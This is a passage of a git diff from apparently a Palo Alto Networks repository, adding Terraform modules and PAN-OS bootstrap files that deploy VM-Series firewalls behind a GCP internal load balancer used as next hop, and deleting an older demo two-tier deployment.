+              <op-command-modes>mgmt-interface-swap</op-command-modes>
+            </initcfg>
+          </management>
+        </setting>
+      </deviceconfig>
+      <vsys>
+        <entry name="vsys1">
+          <application/>
+          <application-group/>
+          <zone>
+            <entry name="trust">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                  <member>loopback.1</member>
+                </layer3>
+              </network>
+            </entry>
+            <entry name="untrust">
+              <network>
+                <layer3>
+                  <member>ethernet1/2</member>
+                </layer3>
+              </network>
+            </entry>
+          </zone>
+          <service/>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <security>
+              <rules>
+                <entry name="allow-all-out">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+                <entry name="allow-health-check">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>35.191.0.0/16</member>
+                    <member>130.211.0.0/22</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <rule-type>universal</rule-type>
+                </entry>
+              </rules>
+            </security>
+            <default-security-rules>
+              <rules>
+                <entry name="intrazone-default">
+                  <action>drop</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+                <entry name="interzone-default">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+              </rules>
+            </default-security-rules>
+            <nat>
+              <rules>
+                <entry name="outbound-hide">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                </entry>
+                <entry name="hc-nat">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>35.191.0.0/16</member>
+                    <member>130.211.0.0/22</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                  <to-interface>ethernet1/1</to-interface>
+                  <dynamic-destination-translation>
+                    <translated-address>100.64.0.1</translated-address>
+                  </dynamic-destination-translation>
+                </entry>
+              </rules>
+            </nat>
+          </rulebase>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/1</member>
+                <member>ethernet1/2</member>
+                <member>loopback.1</member>
+              </interface>
+            </network>
+          </import>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+</config>
diff --git a/gcp/gcp-ilbnh/bootstrap_files_ilbnh/init-cfg.txt b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/init-cfg.txt
new file mode 100644
index 00000000..8d3c0290
--- /dev/null
+++ b/gcp/gcp-ilbnh/bootstrap_files_ilbnh/init-cfg.txt
@@ -0,0 +1,10 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+dhcp-accept-server-hostname=yes
+dns-primary=8.8.8.8
+dns-secondary=4.2.2.2
+op-command-modes=mgmt-interface-swap
\ No newline at end of file
diff --git a/gcp/gcp-ilbnh/ilbnh.tf b/gcp/gcp-ilbnh/ilbnh.tf
new file mode 100644
index 00000000..45879ab7
--- /dev/null
+++ b/gcp/gcp-ilbnh/ilbnh.tf
@@ -0,0 +1,66 @@
+provider "google" {
+  credentials = "${var.main_project_authfile}"
+  project     = "${var.main_project}"
+  region      = "${var.region}"
+  alias       = "ilbnh"
+}
+#************************************************************************************
+# CREATE GCP BUCKET FOR VMSERIES BOOTSTRAP - ILBNH
+#************************************************************************************
+module "bootstrap_ilbnh" {
+  source                = "./modules/create_bootstrap_bucket_ilbnh/"
+  bucket_name           = "vmseries-ilbnh"
+  randomize_bucket_name = true
+  file_location         = "bootstrap_files_ilbnh/"
+  enable_ilbnh          = "${var.enable_ilbnh}"
+  config                = ["init-cfg.txt", "bootstrap.xml"]                                                                          // default []
+  license               = ["authcodes"]                                                                                              // default []
+ # content               = ["panupv2-all-contents-8133-5346", "panup-all-antivirus-2917-3427", "panupv2-all-wildfire-331212-333889"] // default []
+ # software              = ["PanOS_vm-9.0.0"]                                                                                        // default []
+}
+
+#************************************************************************************
+# CREATE 2xVMSERIES FIREWALL W/ 3 NICS (MGMT VPC, UNTRUST VPC, TRUST VPC) - ILBNH
+#************************************************************************************
+module "vm_fw_ilbnh" {
+  source          = "./modules/create_vmseries_ilbnh/"
+  fw_names        = ["vmseries03", "vmseries04"]
+  fw_machine_type = "n1-standard-4"
+  fw_zones        = ["${var.region}-a", "${var.region}-b"]
+  fw_subnetworks  = ["${module.vpc_trust.subnetwork_self_link[0]}", "${module.vpc_mgmt.subnetwork_self_link[0]}", "${module.vpc_untrust.subnetwork_self_link[0]}"]
+  enable_ilbnh    = "${var.enable_ilbnh}"
+  fw_nic0_ip = ["192.168.2.4", "192.168.2.5"] // default [""] - enables dynamically assigned IP
+  fw_nic1_ip = ["192.168.0.4", "192.168.0.5"]
+  fw_nic2_ip = ["192.168.1.4", "192.168.1.5"]
+
+  fw_bootstrap_bucket = "${module.bootstrap_ilbnh.bucket_name}"
+  fw_ssh_key          = "admin:${var.vmseries_ssh_key}"
+  fw_image            = "${var.vmseries_image}"
+
+  create_instance_group = true
+  instance_group_names  = ["vmseries03-ig", "vmseries04-ig"] // default "vmseries-instance-group"
+
+  dependencies = [
+    "${module.bootstrap_ilbnh.completion}",
+  ]
+}
+
+#************************************************************************************
+# CREATE VMSERIES INTERNAL LOAD BALANCER - ILBNH
+#************************************************************************************
+module "vmseries_internal_lb_ilbnh" {
+  source                  = "./modules/create_ilbnh/"
+  internal_lb_name_ilbnh  = "ilbnh"
+  internal_lb_ports_ilbnh = "22"
+  subnetworks             = ["${module.vpc_trust.subnetwork_self_link[0]}"]
+  internal_lbnh_ip        = "192.168.2.6"
+  enable_ilbnh            = "${var.enable_ilbnh}"
+  backends  = [
+    {
+      group = "${module.vm_fw_ilbnh.instance_group[0]}"
+    },
+    {
+      group = "${module.vm_fw_ilbnh.instance_group[1]}"
+    },
+  ]
+}
diff --git a/gcp/gcp-ilbnh/ilbnh_override.tf b/gcp/gcp-ilbnh/ilbnh_override.tf
new file mode 100644
index 00000000..d3bb02dd
--- /dev/null
+++ b/gcp/gcp-ilbnh/ilbnh_override.tf
@@ -0,0 +1,7 @@
+#************************************************************************************
+# ILBNH
+#************************************************************************************
+variable "enable_ilbnh" {
+  description = "If set to true, enable ILB as Next Hop"
+  default     = true
+}
diff --git a/gcp/gcp-ilbnh/modules/create_bootstrap_bucket_ilbnh/main.tf b/gcp/gcp-ilbnh/modules/create_bootstrap_bucket_ilbnh/main.tf
new file mode 100644
index 00000000..23092e2b
--- /dev/null
+++ b/gcp/gcp-ilbnh/modules/create_bootstrap_bucket_ilbnh/main.tf
@@ -0,0 +1,124 @@
+variable enable_ilbnh {
+  default = false
+}
+variable bucket_name {}
+
+variable file_location {}
+
+variable config {
+  type    = "list"
+  default = []
+}
+
+variable content {
+  type    = "list"
+  default = []
+}
+
+variable license {
+  type    = "list"
+  default = []
+}
+
+variable software {
+  default = []
+}
+
+variable randomize_bucket_name {
+  default = false
+}
+
+locals {
+  bucket_name = "${var.randomize_bucket_name ? join("", list(var.bucket_name, random_string.randomstring.result)) : var.bucket_name}"
+}
+
+resource "random_string" "randomstring" {
+  count       = "${var.randomize_bucket_name}"
+  length      = 25
+  min_lower   = 15
+  min_numeric = 10
+  special     = false
+}
+
+resource "google_storage_bucket" "bootstrap" {
+  count         = "${var.enable_ilbnh ? 1 : 0}"
+  name          = "${local.bucket_name}"
+  force_destroy = true
+}
+
+resource "google_storage_bucket_object" "config_full" {
+  count  = "${(length(var.config) > 0 &&  var.enable_ilbnh) ? length(var.config) : "0" }"
+  name   = "config/${element(var.config, count.index)}"
+  source = "${var.file_location}${element(var.config, count.index)}"
+  bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+
+resource "google_storage_bucket_object" "content_full" {
+  count  = "${(length(var.content) > 0 &&  var.enable_ilbnh) ? length(var.content) : "0" }"
+  name   = "content/${element(var.content, count.index)}"
+  source = "${var.file_location}${element(var.content, count.index)}"
+  bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+
+resource "google_storage_bucket_object" "license_full" {
+  count  = "${(length(var.license) > 0 &&  var.enable_ilbnh) ? length(var.license) : "0" }"
+  name   = "license/${element(var.license, count.index)}"
+  source = "${var.file_location}${element(var.license, count.index)}"
+  bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+resource "google_storage_bucket_object" "software_full" {
+  count  = "${(length(var.software) > 0 &&  var.enable_ilbnh) ? length(var.software) : "0" }"
+  name   = "software/${element(var.software, count.index)}"
+  source = "${var.file_location}${element(var.software, count.index)}"
+  bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+resource "google_storage_bucket_object" "config_empty" {
+  count  = "${(length(var.config) == 0 &&  var.enable_ilbnh) ? 1 : 0 }"
+  name   = "config/"
+  content = "config/"
+  bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+
+resource "google_storage_bucket_object" "content_empty" {
+  count  = "${(length(var.content) == 0 &&  var.enable_ilbnh) ? 1 : 0 }"
+  name   = "content/"
+  content = "content/"
+  bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+
+resource "google_storage_bucket_object" "license_empty" {
+  count  = "${(length(var.license) == 0 &&  var.enable_ilbnh) ? 1 : 0 }"
+  name   = "license/"
+  content = "license/"
+  bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+
+resource "google_storage_bucket_object" "software_empty" {
+  count  = "${(length(var.software) == 0 &&  var.enable_ilbnh) ? 1 : 0 }"
+  name   = "software/"
+  content = "software/"
+  bucket = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
+
+
+resource "null_resource" "dependency_setter" {
+  depends_on = [
+    "google_storage_bucket.bootstrap",
+    "google_storage_bucket_object.config_full",
+    "google_storage_bucket_object.content_full",
+    "google_storage_bucket_object.license_full",
+    "google_storage_bucket_object.software_full",
+    "google_storage_bucket_object.config_empty",
+    "google_storage_bucket_object.content_empty",
+    "google_storage_bucket_object.license_empty",
+    "google_storage_bucket_object.software_empty",
+  ]
+}
+
+output "completion" {
+  value = "${null_resource.dependency_setter.id}"
+}
+
+output "bucket_name" {
+  value = "${join(",",google_storage_bucket.bootstrap.*.name)}"
+}
diff --git a/gcp/gcp-ilbnh/modules/create_ilbnh/main.tf b/gcp/gcp-ilbnh/modules/create_ilbnh/main.tf
new file mode 100644
index 00000000..52e818e9
--- /dev/null
+++ b/gcp/gcp-ilbnh/modules/create_ilbnh/main.tf
@@ -0,0 +1,51 @@
+variable enable_ilbnh {
+  default = false
+}
+variable "internal_lb_name_ilbnh" {
+  default = "ilbnh"
+}
+variable "internal_lb_ports_ilbnh" {
+  default = "22"
+}
+variable backends {
+  description = "Map backend indices to list of backend maps."
+  type        = "list"
+}
+variable subnetworks {
+    type = "list"
+}
+variable "internal_lbnh_ip" {
+  default = ""
+}
+#************************************************************************************
+# CREATE VMSERIES INTERNAL LOAD BALANCER - ILBNH
+#************************************************************************************
+resource "google_compute_health_check" "health_check_ilbnh" {
+  name  = "${var.internal_lb_name_ilbnh}-check"
+  count = "${var.enable_ilbnh ? 1 : 0}"
+
+  tcp_health_check {
+    port = "${var.internal_lb_ports_ilbnh}"
+  }
+}
+
+resource "google_compute_region_backend_service" "backend_service_ilbnh" {
+  name              = "${var.internal_lb_name_ilbnh}"
+  count             = "${var.enable_ilbnh ? 1 : 0}"
+  health_checks     = ["${google_compute_health_check.health_check_ilbnh.self_link}"]
+  backend           = ["${var.backends}"] 
+  session_affinity  = "CLIENT_IP"
+
+}
+
+
+resource "google_compute_forwarding_rule" "forwarding_rule_ilbnh" {
+  name                  = "${var.internal_lb_name_ilbnh}-all"
+  count                 = "${var.enable_ilbnh ? 1 : 0}"
+  load_balancing_scheme = "INTERNAL"
+  ip_address            = "${var.internal_lbnh_ip}"
+  ip_protocol           = "TCP"
+  all_ports             = true
+  subnetwork            = "${var.subnetworks[0]}"
+  backend_service       = "${google_compute_region_backend_service.backend_service_ilbnh.self_link}"
+}
\ No newline at end of file
diff --git a/gcp/gcp-ilbnh/modules/create_vmseries_ilbnh/main.tf b/gcp/gcp-ilbnh/modules/create_vmseries_ilbnh/main.tf
new file mode 100644
index 00000000..dcfa2fae
--- /dev/null
+++ b/gcp/gcp-ilbnh/modules/create_vmseries_ilbnh/main.tf
@@ -0,0 +1,172 @@
+variable enable_ilbnh {
+  default = false
+}
+variable fw_subnetworks {
+  type = "list"
+}
+
+variable fw_names {
+  type = "list"
+}
+
+variable fw_machine_type {}
+
+variable fw_zones {
+  type = "list"
+}
+
+variable fw_cpu_platform {
+  default = "Intel Skylake"
+}
+
+variable fw_bootstrap_bucket {
+  default = ""
+}
+
+variable fw_ssh_key {}
+
+variable public_lb_create {
+  default = false
+}
+
+variable fw_scopes {
+  type = "list"
+
+  default = [
+    "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+    "https://www.googleapis.com/auth/devstorage.read_only",
+    "https://www.googleapis.com/auth/logging.write",
+    "https://www.googleapis.com/auth/monitoring.write",
+  ]
+}
+
+variable fw_image {}
+
+variable fw_tags {
+  type    = "list"
+  default = []
+}
+
+variable create_instance_group {
+  default = false
+}
+
+variable instance_group_names {
+  type    = "list"
+  default = ["vmseries-instance-group"]
+}
+
+variable "dependencies" {
+  type    = "list"
+  default = []
+}
+
+variable fw_nic0_ip {
+  type    = "list"
+  default = []
+}
+
+variable fw_nic1_ip {
+  type    = "list"
+  default = []
+}
+
+variable fw_nic2_ip {
+  type    = "list"
+  default = []
+}
+variable instance_group {
+  type = "list"
+  default = []
+}
+
+resource "null_resource" "dependency_getter" {
+  provisioner "local-exec" {
+    command = "echo ${length(var.dependencies)}"
+  }
+}
+
+#************************************************************************************
+# CREATE VMSERIES 
+#***********************************************************************************
+resource "google_compute_instance" "vmseries" {
+  count                     = "${(length(var.fw_names) > 0 &&  var.enable_ilbnh) ? length(var.fw_names) : "0" }"
+  name                      = "${element(var.fw_names, count.index)}"
+  machine_type              = "${var.fw_machine_type}"
+  zone                      = "${element(var.fw_zones, count.index)}"
+  min_cpu_platform          = "${var.fw_cpu_platform}"
+  can_ip_forward            = true
+  allow_stopping_for_update = true
+  tags                      = "${var.fw_tags}"
+
+  metadata {
+    vmseries-bootstrap-gce-storagebucket = "${var.fw_bootstrap_bucket}"
+    serial-port-enable                   = true
+    sshKeys                              = "${var.fw_ssh_key}"
+  }
+
+  service_account {
+    scopes = "${var.fw_scopes}"
+  }
+
+  network_interface {
+    subnetwork    = "${var.fw_subnetworks[0]}"
+    network_ip    = "${element(var.fw_nic0_ip, count.index)}"
+  }
+
+  network_interface {
+    subnetwork    = "${var.fw_subnetworks[1]}"
+    access_config = {}
+    network_ip    = "${element(var.fw_nic1_ip, count.index)}"
+  }
+
+  network_interface {
+    subnetwork    = "${var.fw_subnetworks[2]}"
+    access_config = {}
+    network_ip    = "${element(var.fw_nic2_ip, count.index)}"
+  }
+
+  boot_disk {
+    initialize_params {
+      image = "${var.fw_image}"
+    }
+  }
+
+  depends_on = [
+    "null_resource.dependency_getter",
+  ]
+}
+
+#************************************************************************************
+# CREATE INSTANCE GROUP
+#************************************************************************************
+resource "google_compute_instance_group" "vmseries" {
+  count     = "${(var.create_instance_group && var.enable_ilbnh) ? length(var.fw_names) : 0}"
+  name      = "${element(var.instance_group_names, count.index)}"
+  zone      = "${element(var.fw_zones, count.index)}"
+  instances = ["${google_compute_instance.vmseries.*.self_link[count.index]}"]
+}
+
+#************************************************************************************
+# OUTPUTS
+#************************************************************************************
+
+output "fw_names" {
+  value = "${google_compute_instance.vmseries.*.name}"
+}
+
+output "fw_self_link" {
+  value = "${google_compute_instance.vmseries.*.self_link}"
+}
+
+output "instance_group" {
+  value = "${concat(google_compute_instance_group.vmseries.*.self_link, list(""), list(""))}"
+}
+
+output "fw_nic0_public_ip" {
+  value = "${google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip}"
+}
+
+output "fw_nic1_public_ip" {
+  value = "${google_compute_instance.vmseries.*.network_interface.2.access_config.0.nat_ip}"
+}
diff --git a/gcp/gcp-terraform-mclimans/README.md b/gcp/gcp-terraform-mclimans/README.md
deleted file mode 100644
index 7b55a4f9..00000000
--- a/gcp/gcp-terraform-mclimans/README.md
+++ /dev/null
@@ -1 +0,0 @@
-GCP terraform builds by mmclimans@paloaltonetworks.com
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/README.md b/gcp/gcp-terraform-mclimans/demo_deployments/README.md
deleted file mode 100644
index 3993db83..00000000
--- a/gcp/gcp-terraform-mclimans/demo_deployments/README.md
+++ /dev/null
@@ -1 +0,0 @@
-Demo deployments for testing and demonstrations in isolated enviroments.  Do not use in any production environments.
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcloudkey.pub b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcloudkey.pub
deleted file mode 100644
index 14ab5c49..00000000
--- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcloudkey.pub
+++ /dev/null
@@ -1 +0,0 @@
-REPLACE THIS FILE WITH YOUR PUBLIC KEY FOR SSH ACCESS TO BACKEND VMs
\ No newline at end of file
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcp-credentials.json b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcp-credentials.json
deleted file mode 100644
index b3acf687..00000000
--- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/gcp-credentials.json
+++ /dev/null
@@ -1,3 +0,0 @@
-{
- "comment": "REPLACE THIS FILE WITH YOUR GCE API KEY (JSON FORMAT)"
-} 
\ No newline at end of file
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/main.tf b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/main.tf
deleted file mode 100644
index 4a522608..00000000
--- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/main.tf
+++ /dev/null
@@ -1,355 +0,0 @@
-/*
-*************************************************************************************************************
-**                                                                                                         **
-**  author:  mmclimans                                                                                     **
-**  date:    4/1/19                                                                                        **
-**  contact: mmclimans@paloaltonetworks.com                                                                **
-**                                                                                                         **  
-**                                              SUPPORT POLICY                                             **
-**                                                                                                         **
-**  This build is released under an as-is, best effort, support policy.                                    **
-**  These scripts should be seen as community supported and Palo Alto Networks will contribute our         **
-**  expertise as and when possible. We do not provide technical support or help in using or                **
-**  troubleshooting the components of the project through our normal support options such as               **
-**  Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support    ** 
-**  options. The underlying product used (the VM-Series firewall) by the scripts or templates are still    ** 
-**  supported, but the support is only for the product functionality and not for help in deploying or      ** 
-**  using the template or script itself. Unless explicitly tagged,  all projects or work posted in our     **
-**  GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads  **
-**  page on https://support.paloaltonetworks.com are provided under the best effort policy.                **
-**                                                                                                         **
-*************************************************************************************************************
-*/
-
-# SET AUTHENTICATION TO GCE API
-provider "google" {
-  credentials = "${file(var.gcp_credentials_file)}"
-  project     = "${var.my_gcp_project}"
-  region      = "${var.region}"
-}
-
-############################################################################################
-############################################################################################
-# CREATE BUCKET & UPLOAD VMSERIES BOOTSTRAP FILES
-resource "google_storage_bucket" "bootstrap" {
-  name          = "${var.bootstrap_bucket}"
-  force_destroy = true
-}
-resource "google_storage_bucket_object" "bootstrap_xml" {
-  name   = "config/bootstrap.xml"
-  source = "bootstrap/bootstrap.xml"
-  bucket = "${google_storage_bucket.bootstrap.name}"
-}
-resource "google_storage_bucket_object" "init-cfg" {
-  name   = "config/init-cfg.txt"
-  source = "bootstrap/init-cfg.txt"
-  bucket = "${google_storage_bucket.bootstrap.name}"
-}
-resource "google_storage_bucket_object" "content" {
-  name   = "content/panupv2-all-contents-8138-5378"
-  source = "bootstrap/panupv2-all-contents-8138-5378"
-  bucket = "${google_storage_bucket.bootstrap.name}"
-}
-resource "google_storage_bucket_object" "software" {
-  name   = "software/"
-  source = "/dev/null"
-  bucket = "${google_storage_bucket.bootstrap.name}"
-}
-resource "google_storage_bucket_object" "license" {
-  name   = "license/"
-  source = "/dev/null"
-  bucket = "${google_storage_bucket.bootstrap.name}"
-}
-
-
-############################################################################################
-############################################################################################
-# CREATE VPCS AND SUBNETS
-resource "google_compute_network" "mgmt" {
-  name                    = "${var.mgmt_vpc}"
-  auto_create_subnetworks = "false"
-}
-resource "google_compute_subnetwork" "mgmt_subnet" {
-  name          = "${var.mgmt_vpc_subnet}"
-  ip_cidr_range = "${var.mgmt_vpc_subnet_cidr}"
-  network       = "${google_compute_network.mgmt.name}"
-  region        = "${var.region}"
-}
-resource "google_compute_network" "untrust" {
-  name                    = "${var.untrust_vpc}"
-  auto_create_subnetworks = "false"
-}
-resource "google_compute_subnetwork" "untrust_subnet" {
-  name          = "${var.untrust_vpc_subnet}"
-  ip_cidr_range = "${var.untrust_vpc_subnet_cidr}"
-  network       = "${google_compute_network.untrust.name}"
-  region        = "${var.region}"
-}
-resource "google_compute_network" "web" {
-  name                    = "${var.web_vpc}"
-  auto_create_subnetworks = "false"
-}
-resource "google_compute_subnetwork" "web_subnet" {
-  name          = "${var.web_vpc_subnet}"
-  ip_cidr_range = "${var.web_vpc_subnet_cidr}"
-  network       = "${google_compute_network.web.name}"
-  region        = "${var.region}"
-}
-resource "google_compute_network" "db" {
-  name                    = "${var.db_vpc}"
-  auto_create_subnetworks = "false"
-}
-resource "google_compute_subnetwork" "db_subnet" {
-  name          = "${var.db_vpc_subnet}"
-  ip_cidr_range = "${var.db_vpc_subnet_cidr}"
-  network       = "${google_compute_network.db.name}"
-  region        = "${var.region}"
-}
-
-
-############################################################################################
-############################################################################################
-# CREATE GCP VPC ROUTES
-resource "google_compute_route" "web_vpc_route" {
-  name        = "web-vpc-route"
-  dest_range  = "0.0.0.0/0"
-  network     = "${google_compute_network.web.name}"
-  next_hop_ip = "${var.fw_nic2_ip}"
-  priority    = 100
-  depends_on = [
-    "google_compute_instance.firewall",
-    "google_compute_subnetwork.mgmt_subnet",
-    "google_compute_subnetwork.untrust_subnet",
-    "google_compute_subnetwork.web_subnet",
-    "google_compute_subnetwork.db_subnet",
-  ]
-}
-resource "google_compute_route" "db_vpc_route" {
-  name        = "db-vpc-route"
-  dest_range  = "0.0.0.0/0"
-  network     = "${google_compute_network.db.name}"
-  next_hop_ip = "${var.fw_nic3_ip}"
-  priority    = 100
-  depends_on = [
-    "google_compute_instance.firewall",
-    "google_compute_subnetwork.mgmt_subnet",
-    "google_compute_subnetwork.untrust_subnet",
-    "google_compute_subnetwork.web_subnet",
-    "google_compute_subnetwork.db_subnet",
-  ]
-}
-
-
-############################################################################################
-############################################################################################
-# CREATE GCP VPC FIREWALL RULES
-resource "google_compute_firewall" "mgmt_vpc_ingress" {
-  name          = "mgmt-ingress"
-  network       = "${google_compute_network.mgmt.name}"
-  direction     = "INGRESS"
-  source_ranges = ["0.0.0.0/0"]
-  allow {
-    protocol = "icmp"
-  }
-  allow {
-    protocol = "tcp"
-    ports    = ["443", "22", "3897"]
-  }
-}
-resource "google_compute_firewall" "mgmt_vpc_egress" {
-  name               = "mgmt-vpc-egress"
-  network            = "${google_compute_network.mgmt.name}"
-  direction          = "EGRESS"
-  destination_ranges = ["0.0.0.0/0"]
-  allow {
-    protocol = "all"
-  }
-}
-resource "google_compute_firewall" "untrust_vpc_ingress" {
-  name          = "untrust-vpc-ingress"
-  network       = "${google_compute_network.untrust.name}"
-  direction     = "INGRESS"
-  source_ranges = ["0.0.0.0/0"]
-  allow {
-    protocol = "all"
-  }
-}
-resource "google_compute_firewall" "untrust_vpc_egress" {
-  name               = "untrust-vpc-egress"
-  network            = "${google_compute_network.untrust.name}"
-  direction          = "EGRESS"
-  destination_ranges = ["0.0.0.0/0"]
-  allow {
-    protocol = "all"
-  }
-}
-resource "google_compute_firewall" "web_vpc_ingress" {
-  name          = "web-vpc-ingress"
-  network       = "${google_compute_network.web.name}"
-  direction     = "INGRESS"
-  source_ranges = ["0.0.0.0/0"]
-  allow {
-    protocol = "all"
-  }
-}
-resource "google_compute_firewall" "web_vpc_egress" {
-  name               = "web-vpc-egress"
-  network            = "${google_compute_network.web.name}"
-  direction          = "EGRESS"
-  destination_ranges = ["0.0.0.0/0"]
-  allow {
-    protocol = "all"
-  }
-}
-resource "google_compute_firewall" "db_vpc_ingress" {
-  name          = "db-vpc-ingress"
-  network       = "${google_compute_network.db.name}"
-  direction     = "INGRESS"
-  source_ranges = ["0.0.0.0/0"]
-  allow {
-    protocol = "all"
-  }
-}
-resource "google_compute_firewall" "db_vpc_egress" {
-  name               = "db-vpc-egress"
-  network            = "${google_compute_network.db.name}"
-  direction          = "EGRESS"
-  destination_ranges = ["0.0.0.0/0"]
-  allow {
-    protocol = "all"
-  }
-}
-
-
-############################################################################################
-############################################################################################
-# CREATE VM-SERIES
-resource "google_compute_instance" "firewall" {
-  name                      = "${var.fw_vm_name}"
-  machine_type              = "${var.fw_machine_type}"
-  zone                      = "${var.zone}"
-  min_cpu_platform          = "${var.fw_machine_cpu}"
-  can_ip_forward            = true
-  allow_stopping_for_update = true
-  count                     = 1
-
-  metadata {
-    vmseries-bootstrap-gce-storagebucket = "${var.bootstrap_bucket}"
-    serial-port-enable                   = true
-  }
-  service_account {
-    scopes = "${var.fw_scopes}"
-  }
-  network_interface {
-    subnetwork    = "${google_compute_subnetwork.mgmt_subnet.name}"
-    network_ip    = "${var.fw_nic0_ip}"
-    access_config = {}
-  }
-  network_interface {
-    subnetwork    = "${google_compute_subnetwork.untrust_subnet.name}"
-    network_ip    = "${var.fw_nic1_ip}"
-    access_config = {}
-  }
-  network_interface {
-    subnetwork = "${google_compute_subnetwork.web_subnet.name}"
-    network_ip    = "${var.fw_nic2_ip}"
-  }
-  network_interface {
-    subnetwork = "${google_compute_subnetwork.db_subnet.name}"
-    network_ip    = "${var.fw_nic3_ip}"
-  }
-  boot_disk {
-    initialize_params {
-      image = "${var.fw_image}"
-    }
-  }
-    depends_on = [
-    "google_storage_bucket.bootstrap",
-    "google_storage_bucket_object.bootstrap_xml",
-    "google_storage_bucket_object.init-cfg",
-    "google_storage_bucket_object.content",
-    "google_storage_bucket_object.license",
-    "google_storage_bucket_object.software",
-  ]
-}
-
-
-############################################################################################
-############################################################################################
-# CREATE DB SERVER
-resource "google_compute_instance" "dbserver" {
-  name                      = "${var.db_vm_name}"
-  machine_type              = "${var.db_machine_type}"
-  zone                      = "${var.zone}"
-  can_ip_forward            = true
-  allow_stopping_for_update = true
-  count                     = 1
-  metadata_startup_script   = "${file("${path.module}/scripts/dbserver-startup.sh")}"
-  metadata {
-    serial-port-enable = true
-    sshKeys            = "${var.gcp_ssh_user}:${file(var.gcp_key_file)}"
-  }
-  network_interface {
-    subnetwork = "${google_compute_subnetwork.db_subnet.name}"
-    network_ip = "${var.db_nic0_ip}"
-  }
-  service_account {
-    scopes     = "${var.vm_scopes}"
-  }
-  boot_disk {
-    initialize_params {
-      image = "${var.vm_image}"
-    }
-  }
-  depends_on = [
-    "google_compute_instance.firewall",
-    "google_compute_subnetwork.mgmt_subnet",
-    "google_compute_subnetwork.untrust_subnet",
-    "google_compute_subnetwork.web_subnet",
-    "google_compute_subnetwork.db_subnet",
-  ]
-}
-
-
-############################################################################################
-############################################################################################
-# CREATE WEB SERVER
-resource "google_compute_instance" "webserver" {
-  name                      = "${var.web_vm_name}"
-  machine_type              = "${var.web_machine_type}"
-  zone                      = "${var.zone}"
-  can_ip_forward            = true
-  allow_stopping_for_update = true
-  count                     = 1
-  metadata_startup_script   = "${file("${path.module}/scripts/webserver-startup.sh")}"
-  metadata {
-    serial-port-enable = true
-    sshKeys            = "${var.gcp_ssh_user}:${file(var.gcp_key_file)}"
-  }
-  network_interface {
-    subnetwork = "${google_compute_subnetwork.web_subnet.name}"
-    network_ip = "${var.web_nic0_ip}"
-  }
-  boot_disk {
-    initialize_params {
-      image = "${var.vm_image}"
-    }
-  }
-  service_account {
-    scopes = "${var.vm_scopes}"
-  }
-  depends_on = [
-    "google_compute_instance.firewall",
-    "google_compute_subnetwork.mgmt_subnet",
-    "google_compute_subnetwork.untrust_subnet",
-    "google_compute_subnetwork.web_subnet",
-    "google_compute_subnetwork.db_subnet",
-  ]
-}
-
-
-############################################################################################
-############################################################################################
-output "DEPLOYMENT STATUS" {
-    value = "COMPLETE"
-}
\ No newline at end of file
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/dbserver-startup.sh b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/dbserver-startup.sh
deleted file mode 100644
index f618cd97..00000000
